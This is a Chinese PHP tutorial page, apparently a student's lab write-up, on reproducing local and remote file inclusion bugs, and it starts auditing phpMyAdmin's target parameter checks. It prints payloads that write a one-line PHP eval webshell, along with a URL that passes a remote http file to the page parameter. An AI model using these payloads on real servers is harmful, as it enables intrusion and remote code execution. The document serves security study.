[PHP知识库] 本地文件包含&远程文件包含漏洞复现

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> 本地文件包含&远程文件包含漏洞复现 -> 正文阅读

[PHP知识库]本地文件包含&远程文件包含漏洞复现

文件包含介绍
服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件，无论这个文件是不是PHP为其后缀，都可以当成PHP执行。这本身并不是漏洞，但是当其以其解析特性讲任意文件当成PHP解析，这时候漏洞就出来了，假如：我们上传一张包含木马的图片，按照它的特性当成PHP解析，这时候漏洞就产生了。感觉主要是其对解析和执行包含的文件未进行辨别和控制和严格过滤造成的。
文件包含分为本地文件包含和远程文件包含；本地文件时包含本地服务器的文件，比如：你上传文件到它服务器，它进行包含和执行，如果文件存在恶意代码它同样会当成PHP进行执行，而远程文件包含可以通过http包含别的地址非本地的文件，如：包含别的服务器的文件进行包含执行。
远程包含如：
<?fputs(fopen(“shell.php”,”w”),”<?php eval($_POST[xxx]);?>”)?>
远程包含如http://192.168.199.110/fileincl/example2.php?page=http://www.xxx.com/xxx.txt
此时在服务器根目录下就会生成shell.php文件，内容为一句话木马
<?php eval($_POST[xxx]);?>
远程文件包含需要PHPstudy的phpini文件中是allow_url_fopen是打开状态，远程文件包含才能用，（默认好像是关闭的）

老师课上还讲了几个可能产生文件包含漏洞的函数：
include():php执行时调用include（）中被包含的文件，文件加载失败或加载错误它虽然报错但是会继续往下执行。
require（）PHP执行前require函数会提取被包含的的文件，如果加载或者调用失败，则整个文件都不执行。
require_once()//include_once()和上面的区别不大，区别主要是这两个函数只能包含一次，不能重复包含。
课上老师再一次提到了这个函数，在条件竞争时讲过file_put_contents(‘2.php’,’<?php eval($_REQUEST[a])?>’);
写一句话木马到2.php
下面靶场演示
http://59.63.200.79:8010/lfi/phpMyAdmin.zip
下载靶场用到的源码导入到审计工具便于审计

上面讲的两个函数容易导致文件包含，这里直接搜索这两个函数试试

点进去看下

发现需要满足条件才能执行到target
if (! empty($_REQUEST[‘target’])
&& is_string($_REQUEST[‘target’])
&& ! preg_match(‘/^index/‘, $_REQUEST[‘target’])
&& ! in_array($_REQUEST[‘target’], $target_blacklist)
&& Core::checkPageValidity($_REQUEST[‘target’])
需要五项都满足条件代码才能顺利执行到我们想让它执行的位置
下面我们逐个追看百度查看查询函数的每个条件怎么满足和函数功能：
(! empty($_REQUEST[‘target’]）///empty()函数功能是检测一个变量是否为空。
is_string($_REQUEST[‘target’])///is_string()检测变量是不是字符串。
! preg_match(‘/^index/‘, $_REQUEST[‘target’])///preg_match()/函数进行正则匹配，匹配REQUEST中的参数是否是以index开头，‘！’是非的意思，在这里面就是不能以index开头。
! in_array($_REQUEST[‘target’], $target_blacklist)///backlist黑名单的意思，in_arrar(1,2)用1跟2进行匹配，匹配到返回true，匹配不到返回false。加了‘！’说面匹配的传参不能是黑名单中的东西。